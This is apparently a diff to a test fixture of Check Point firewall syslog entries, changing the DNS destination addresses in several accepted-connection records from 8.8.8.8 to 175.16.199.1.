-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44102"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58828"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53163"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44102"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53168"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38311"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56948"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38311"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56948"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54438"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.11.238.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52140"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48060"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33344"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54835"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35074"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57619"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52672"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48060"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33344"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54835"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35074"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57619"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52672"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddef,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37862"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddef,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43776"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10104"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddef,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43778"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10105"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddef,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43780"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10106"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.174.89"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55252"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddef,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
